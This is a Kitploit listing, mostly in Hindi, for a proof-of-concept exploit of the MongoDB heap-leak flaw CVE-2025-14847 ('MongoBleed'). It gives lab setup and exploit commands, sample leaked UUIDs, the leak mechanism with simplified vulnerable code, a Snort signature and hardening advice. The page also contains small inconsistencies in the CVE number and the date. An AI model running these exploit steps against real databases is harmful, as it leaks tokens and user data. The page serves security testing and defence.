Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14857-MongoBleed — CVE-2025-14847 (MongoBleed) के लिए कार्यात्मक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MongoDB में एक प्री-ऑथेंटिकेशन हीप मेमोरी डिस्क्लोज़र भेद्यता है। इसमें स्वचालित मेमोरी लीक डिटेक्शन, पैटर्न विश्लेषण, और अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए Docker-आधारित लैब वातावरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/ermensonx/cve-2025-14857-mongobleed
मेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubermensonx/cve-2025-14857-mongobleed

CVE-2025-14857-MongoBleed

CVE-2025-14847 (MongoBleed) के लिए कार्यात्मक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MongoDB में एक प्री-ऑथेंटिकेशन हीप मेमोरी डिस्क्लोज़र भेद्यता है। इसमें स्वचालित मेमोरी लीक डिटेक्शन, पैटर्न विश्लेषण, और अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए Docker-आधारित लैब वातावरण शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
68 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-14847 (MongoBleed) - कार्यात्मक PoC

MongoDB में मेमोरी लीक का शोषण - अनुकरणीय R6 हमला

CVE MongoDB स्थिति सफलता दर

CVE-2025-14847 (MongoBleed) के लिए पूर्ण प्रमाण-अवधारणा
परीक्षित: ✅ MongoDB 7.0.5 | 14.300+ सफल शोषण | 4 UUID लीक


🎯 परियोजना के बारे में

यह रिपॉजिटरी CVE-2025-14847 भेद्यता के लिए एक पूरी तरह से कार्यात्मक प्रमाण-अवधारणा (PoC) रखता है, जिसे MongoBleed के नाम से जाना जाता है - MongoDB में प्रमाणीकरण-पूर्व हीप मेमोरी रिसाव की एक गंभीर खामी।

संदर्भ: रेनबो सिक्स सीज घटना

दिसंबर 2025 में, रेनबो सिक्स सीज गेम पर एक बड़ा हमला हुआ जिसमें ~50.000 खिलाड़ी खातों से समझौता हुआ। संदेह है कि हमलावरों ने बैकएंड MongoDB में इस भेद्यता का शोषण किया ताकि लीक कर सकें:

  • 🔑 सर्वर प्रमाणीकरण टोकन (R6S_SERVER_AUTH_*)
  • 👤 खिलाड़ियों के UUID और सत्र IDs
  • 🛡️ प्रशासनिक विशेषाधिकार फ़्लैग (TOURNAMENT_ADMIN, DEV_BUILD_WHITELIST)

यह PoC R6 के यथार्थवादी डेटा के साथ हमले का अनुकरण करता है।


🔥 विशेषताएँ

  • ✅ MongoDB 7.0.5 के विरुद्ध 100% कार्यात्मक शोषण
  • ✅ 3 शोषण उपकरण:
    • poc.py - पैटर्न विश्लेषण के साथ मुख्य शोषण
    • live_leaker.py - उन्नत वृद्धिशील स्कैनिंग
    • popular_heap.py - लक्ष्य डेटा से हीप भरने की स्क्रिप्ट
  • ✅ भेद्य MongoDB के साथ पूर्ण Docker वातावरण
  • ✅ R6 बैकएंड के 1500+ अनुकरणीय दस्तावेज़
  • ✅ 10 संवेदनशील पैटर्न की स्वचालित पहचान (JWT, टोकन, UUID, IP)
  • ✅ संरचित JSON रिपोर्ट
  • ✅ पूर्ण तकनीकी दस्तावेज़ीकरण (200+ पृष्ठ)

📊 मान्य परिणाम

निकाले गए UUID (वास्तविक प्रमाण)

root@kitploit:~
246434ed-759b-4ce9-bb9c-2f520a9919b8
980ab3a7-0230-4718-aa2d-fb28feafd7f5
1052a310-4cdc-492f-9890-465d76baba9b
f20debfa-298d-48e3-b3b9-9a0e037c0fbd

🚀 त्वरित प्रारंभ

आवश्यक शर्तें

  • Docker और Docker Compose
  • Python 3.8+

स्थापना

root@kitploit:~
# Clone o repositório
git clone CVE-2025-14857-MongoBleed.git
cd MongoDBPoc

# Inicie o ambiente vulnerável
docker-compose up -d

# Aguarde inicialização (15-20s)
docker logs cve-2025-14847-lab | grep "R6 MASSIVE"

मूल उपयोग

root@kitploit:~
# 1. Popular heap com dados R6
python3 popular_heap.py 50

# 2. Verificar vulnerabilidade
python3 poc.py --target 127.0.0.1 --check

# 3. Explorar com live leaker (RECOMENDADO)
timeout 30 python3 live_leaker.py --host 127.0.0.1 --min 200 --max 3000 --save results.json

अपेक्षित आउटपुट

root@kitploit:~
[!] MongoBleed Live Leaker Avançado
[!] Alvo: 127.0.0.1:27017
[!] Faixa: doc_len 200 → 3000 (offset=500)

[*] Progresso: doc_len=245/3000 | Tentativas=100 | Taxa sucesso=100.0%

[!] PADRÕES R6 DETECTADOS (doc_len=245):
    [UUID] 1 novo(s):
      └─ 246434ed-759b-4ce9-bb9c-2f520a9919b8

🔬 यह कैसे काम करता है

भेद्यता तंत्र

MongoDB zlib के माध्यम से संदेश संपीड़न की अनुमति देता है। भेद्यता घोषित आकार बनाम वास्तविक आकार के अपर्याप्त सत्यापन में है:

root@kitploit:~
Atacante → {compress: "zlib", uncompressedSize: 1MB, payload: <50 bytes>}
          ↓
Servidor aloca 1MB de heap  ← VULNERABILIDADE
          ↓
Servidor descomprime apenas 50 bytes
          ↓
Servidor retorna 1MB inteiro!
          └─ 50 bytes = dados reais
          └─ ~1MB - 50 = VAZAMENTO DE MEMÓRIA

भेद्य कोड (सरलीकृत)

root@kitploit:~
// ANTES DO PATCH
size_t uncompressedSize = header.uncompressedSize;  // ← Controlado pelo atacante
buffer = malloc(uncompressedSize);                  // ← Aloca tamanho malicioso
zlib_decompress(compressed, buffer);
send(buffer, uncompressedSize);                     // ← VAZA BUFFER INTEIRO

📂 परियोजना संरचना

root@kitploit:~
MongoDBPoc/
├── poc.py                          # मुख्य शोषण
├── live_leaker.py                  # वृद्धिशील स्कैनिंग (✨ अनुशंसित)
├── popular_heap.py                 # लोड स्क्रिप्ट
├── docker-compose.yml              # भेद्य MongoDB 7.0.5
├── init-db.js                      # 1000 खिलाड़ी + 500 सत्र R6
├── GUIA_TECNICO_COMPLETO.md       # विस्तृत दस्तावेज़ीकरण (200+ पृष्ठ)
├── README.MD                       # अंग्रेज़ी में दस्तावेज़ीकरण
└── Portugues/                      # अनुवादित संस्करण
    ├── poc_PT.py
    ├── README_PT.md
    └── GUIA_RAPIDO.md

🛡️ प्रभावित संस्करण


🛡️ पहचान और बचाव

Snort हस्ताक्षर

root@kitploit:~
alert tcp any any -> any 27017 (
    msg:"CVE-2025-14847 MongoBleed Attempt";
    content:"|d4 07 00 00|";
    byte_test:4,>,1000000,4,little;
    sid:2025001;
)

सुरक्षित कॉन्फ़िगरेशन (mongod.conf)

root@kitploit:~
net:
  bindIp: 127.0.0.1              # NUNCA 0.0.0.0!
  compression:
    compressors: []              # Desabilitar zlib

security:
  authorization: enabled

शमन प्राथमिकताएँ

  1. 🔴 गंभीर: सुधारित संस्करण में अद्यतन करें
  2. 🟠 उच्च: zlib संपीड़न अक्षम करें
  3. 🟠 उच्च: नेटवर्क विभाजन (फ़ायरवॉल)
  4. 🟡 मध्यम: प्रमाणीकरण सक्षम करें

📚 दस्तावेज़ीकरण

  • GUIA_TECNICO_COMPLETO.md - पूर्ण तकनीकी विश्लेषण (200+ पृष्ठ)
    • R6 घटना का संदर्भ
    • भेद्यता तंत्र
    • भेद्य बनाम सुधारित कोड
    • चरण-दर-चरण निष्पादन
    • परिणाम और आँकड़े
    • IDS हस्ताक्षर और हार्डनिंग
  • README.MD - मुख्य दस्तावेज़ीकरण (अंग्रेज़ी)
  • Portugues/ - अनुवादित संस्करण

⚠️ कानूनी चेतावनी

यह उपकरण केवल अधिकृत परीक्षण और शिक्षा के लिए है।

अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप हो सकता है:

  • आपराधिक मुकदमा (ब्राज़ील में कानून 12.737/2012 के तहत)
  • भारी जुर्माना
  • कारावास

परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें।

अनुमत उपयोग

  • ✅ लिखित अनुमति के साथ प्रवेश परीक्षण
  • ✅ पृथक वातावरण में अकादमिक अनुसंधान
  • ✅ विक्रेता पैच का सत्यापन
  • ✅ सुरक्षा टीमों का प्रशिक्षण

निषिद्ध उपयोग

  • ❌ बिना अनुमति सिस्टम की स्कैनिंग या हमला
  • ❌ उत्पादन डेटाबेस तक पहुँच
  • ❌ इस कोड की बिक्री या हथियारीकरण

🙏 श्रेय

लेखक: Ermenson Jr
लाइसेंस: MIT (शैक्षिक उपयोग)
दिनांक: जनवरी 2026

संदर्भ

  • MongoDB Security Advisory
  • CVE-2025-14847 NVD
  • Akamai SIRT: MongoBleed Analysis
  • Aikido Security

📧 संपर्क

तकनीकी प्रश्नों या सुरक्षा अनुसंधान में सहयोग के लिए:

  • GitHub Issues: इस रिपॉजिटरी के Issues टैब का उपयोग करें
  • शैक्षिक ईमेल: GitHub प्रोफ़ाइल पर उपलब्ध

🌟 यदि यह परियोजना उपयोगी थी

  • ⭐ इस रिपॉजिटरी को एक स्टार दें
  • 🔄 सुरक्षा समुदाय के साथ साझा करें
  • 📝 अपने अकादमिक शोध में उद्धृत करें
  • 🐛 Issues के माध्यम से बग या सुधार रिपोर्ट करें

जिम्मेदार आक्रामक सुरक्षा अनुसंधान के लिए विकसित।
Ubisoft, MongoDB Inc., या Rainbow Six Siege से संबद्ध नहीं।

🔒 जिम्मेदारी से उपयोग करें। सुरक्षा सभी के लिए है। 🔒

टूल डाउनलोड करें
मीट्रिकपरिणाम
परीक्षित MongoDB7.0.5 (भेद्य)
सफलता दर100% (14.300/14.300 अनुरोध)
लीक हुए UUID4 अद्वितीय
कुल लीक33 भिन्न स्ट्रिंग
सबसे बड़ा लीक176 बाइट्स/अनुरोध
पता लगाए गए पैटर्ननेटवर्क लॉग, UUID, सिस्टम पथ
MongoDB श्रृंखलाभेद्य संस्करणसुधारित संस्करण
8.2.x8.2.0 – 8.2.28.2.3
8.0.x8.0.0 – 8.0.168.0.17
7.0.x7.0.0 – 7.0.277.0.28
6.0.x6.0.0 – 6.0.266.0.27
5.0.x5.0.0 – 5.0.315.0.32
4.4.x4.4.0 – 4.4.294.4.30
≤ 4.2सभीबिना पैच (EOL)